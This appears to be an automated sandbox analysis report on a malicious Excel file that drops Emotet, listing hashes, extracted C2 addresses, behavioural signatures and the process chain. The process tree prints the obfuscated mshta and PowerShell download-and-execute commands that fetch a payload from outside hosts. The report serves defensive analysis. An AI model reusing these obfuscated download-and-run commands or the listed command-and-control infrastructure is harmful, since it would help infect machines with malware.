Analysis
-
max time kernel
129s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 12:55
Behavioral task
behavioral1
Sample
c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls
Resource
win10-en-20211208
General
-
Target
c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls
-
Size
142KB
-
MD5
8d6b43ca03cf1e4d675a523c4b06e214
-
SHA1
6cdde32cd5ce069e00c952575714e66c55f091cc
-
SHA256
c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94
-
SHA512
600dc0d8cd18517e49c8319c8a7e9feb8cdd6354d80ff1c0b7e99ccdbd9fc3651b30c07448792fd7b52ec877068d72a2c664c2e79ca8fcdfd542ff6f1c8f7418
Malware Config
Extracted
http://0xb907d607/fer/fer.html
Extracted
http://185.7.214.7/fer/fer.png
Extracted
emotet
Epoch4
131.100.24.231:80
209.59.138.75:7080
103.8.26.103:8080
51.38.71.0:443
212.237.17.99:8080
79.172.212.216:8080
207.38.84.195:8080
104.168.155.129:8080
178.79.147.66:8080
46.55.222.11:443
103.8.26.102:8080
192.254.71.210:443
45.176.232.124:443
203.114.109.124:443
51.68.175.8:8080
58.227.42.236:80
45.142.114.231:8080
217.182.143.207:443
178.63.25.185:443
45.118.115.99:8080
103.75.201.2:443
104.251.214.46:8080
158.69.222.101:443
81.0.236.90:443
45.118.135.203:7080
176.104.106.96:8080
212.237.56.116:7080
216.158.226.206:443
173.212.193.249:8080
50.116.54.215:443
138.185.72.26:8080
41.76.108.46:8080
212.237.5.209:443
107.182.225.142:8080
195.154.133.20:443
162.214.50.39:7080
110.232.117.186:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1344 2840 cmd.exe EXCEL.EXE -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 19 1880 mshta.exe 20 3136 powershell.exe 22 3136 powershell.exe 45 3872 rundll32.exe 46 3872 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 2448 rundll32.exe 2876 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Meylpseqyfafegq\ugxvewuet.fqp rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2904 1880 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2840 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 3136 powershell.exe 3136 powershell.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 2904 WerFault.exe 3136 powershell.exe 3872 rundll32.exe 3872 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3136 powershell.exe Token: SeDebugPrivilege 2904 WerFault.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE 2840 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 2840 wrote to memory of 1192 2840 EXCEL.EXE splwow64.exe PID 2840 wrote to memory of 1192 2840 EXCEL.EXE splwow64.exe PID 2840 wrote to memory of 1344 2840 EXCEL.EXE cmd.exe PID 2840 wrote to memory of 1344 2840 EXCEL.EXE cmd.exe PID 1344 wrote to memory of 1880 1344 cmd.exe mshta.exe PID 1344 wrote to memory of 1880 1344 cmd.exe mshta.exe PID 1880 wrote to memory of 3136 1880 mshta.exe powershell.exe PID 1880 wrote to memory of 3136 1880 mshta.exe powershell.exe PID 3136 wrote to memory of 3920 3136 powershell.exe cmd.exe PID 3136 wrote to memory of 3920 3136 powershell.exe cmd.exe PID 3920 wrote to memory of 2448 3920 cmd.exe rundll32.exe PID 3920 wrote to memory of 2448 3920 cmd.exe rundll32.exe PID 3920 wrote to memory of 2448 3920 cmd.exe rundll32.exe PID 2448 wrote to memory of 2876 2448 rundll32.exe rundll32.exe PID 2448 wrote to memory of 2876 2448 rundll32.exe rundll32.exe PID 2448 wrote to memory of 2876 2448 rundll32.exe rundll32.exe PID 2876 wrote to memory of 3884 2876 rundll32.exe rundll32.exe PID 2876 wrote to memory of 3884 2876 rundll32.exe rundll32.exe PID 2876 wrote to memory of 3884 2876 rundll32.exe rundll32.exe PID 3884 wrote to memory of 3872 3884 rundll32.exe rundll32.exe PID 3884 wrote to memory of 3872 3884 rundll32.exe rundll32.exe PID 3884 wrote to memory of 3872 3884 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fer.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Meylpseqyfafegq\ugxvewuet.fqp",weNYz8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Meylpseqyfafegq\ugxvewuet.fqp",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1880 -s 16644⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\ssd.dllMD5
e02ff840694a513aa52f00a53cfaf993
SHA1eebde95c08ffdfad981141bc7ef512bba8830458
SHA25615d66dc9c6ef28e9afc1fe9e5d79b94e6dd57fb030d7341fed2169b3af6da273
SHA512c9536b71712a38b550729617e1aa9be99d16a31ee272575e4b80d5f3fe45e701cbed5475177c4dea3e3e6e0ea2890687a31a71ebeecbe68bd8a923308ceeeb60
-
\Users\Public\Documents\ssd.dllMD5
e02ff840694a513aa52f00a53cfaf993
SHA1eebde95c08ffdfad981141bc7ef512bba8830458
SHA25615d66dc9c6ef28e9afc1fe9e5d79b94e6dd57fb030d7341fed2169b3af6da273
SHA512c9536b71712a38b550729617e1aa9be99d16a31ee272575e4b80d5f3fe45e701cbed5475177c4dea3e3e6e0ea2890687a31a71ebeecbe68bd8a923308ceeeb60
-
\Users\Public\Documents\ssd.dllMD5
e02ff840694a513aa52f00a53cfaf993
SHA1eebde95c08ffdfad981141bc7ef512bba8830458
SHA25615d66dc9c6ef28e9afc1fe9e5d79b94e6dd57fb030d7341fed2169b3af6da273
SHA512c9536b71712a38b550729617e1aa9be99d16a31ee272575e4b80d5f3fe45e701cbed5475177c4dea3e3e6e0ea2890687a31a71ebeecbe68bd8a923308ceeeb60
-
memory/2840-128-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmpFilesize
64KB
-
memory/2840-117-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmpFilesize
64KB
-
memory/2840-116-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmpFilesize
64KB
-
memory/2840-129-0x00007FF7E1700000-0x00007FF7E1710000-memory.dmpFilesize
64KB
-
memory/2840-115-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmpFilesize
64KB
-
memory/2840-866-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmpFilesize
64KB
-
memory/2840-865-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmpFilesize
64KB
-
memory/2840-864-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmpFilesize
64KB
-
memory/2840-863-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmpFilesize
64KB
-
memory/2840-127-0x00007FF7E1700000-0x00007FF7E1710000-memory.dmpFilesize
64KB
-
memory/2840-118-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmpFilesize
64KB
-
memory/2876-816-0x0000000005180000-0x00000000051A6000-memory.dmpFilesize
152KB
-
memory/2876-813-0x0000000005020000-0x0000000005046000-memory.dmpFilesize
152KB
-
memory/2876-804-0x0000000002E60000-0x0000000002E86000-memory.dmpFilesize
152KB
-
memory/2876-806-0x0000000002F70000-0x0000000002F96000-memory.dmpFilesize
152KB
-
memory/2876-809-0x0000000004E20000-0x0000000004E46000-memory.dmpFilesize
152KB
-
memory/2876-811-0x0000000004FC0000-0x0000000004FE6000-memory.dmpFilesize
152KB
-
memory/3136-481-0x0000013A26030000-0x0000013A26052000-memory.dmpFilesize
136KB
-
memory/3136-573-0x0000013A0C2E6000-0x0000013A0C2E8000-memory.dmpFilesize
8KB
-
memory/3136-536-0x0000013A0C2E3000-0x0000013A0C2E5000-memory.dmpFilesize
8KB
-
memory/3136-535-0x0000013A0C020000-0x0000013A0C2E2000-memory.dmpFilesize
2.8MB
-
memory/3136-531-0x0000013A266C0000-0x0000013A26736000-memory.dmpFilesize
472KB
-
memory/3136-500-0x0000013A262A0000-0x0000013A262DC000-memory.dmpFilesize
240KB
-
memory/3872-818-0x0000000004830000-0x0000000004856000-memory.dmpFilesize
152KB
-
memory/3884-815-0x00000000030D0000-0x00000000030F6000-memory.dmpFilesize
152KB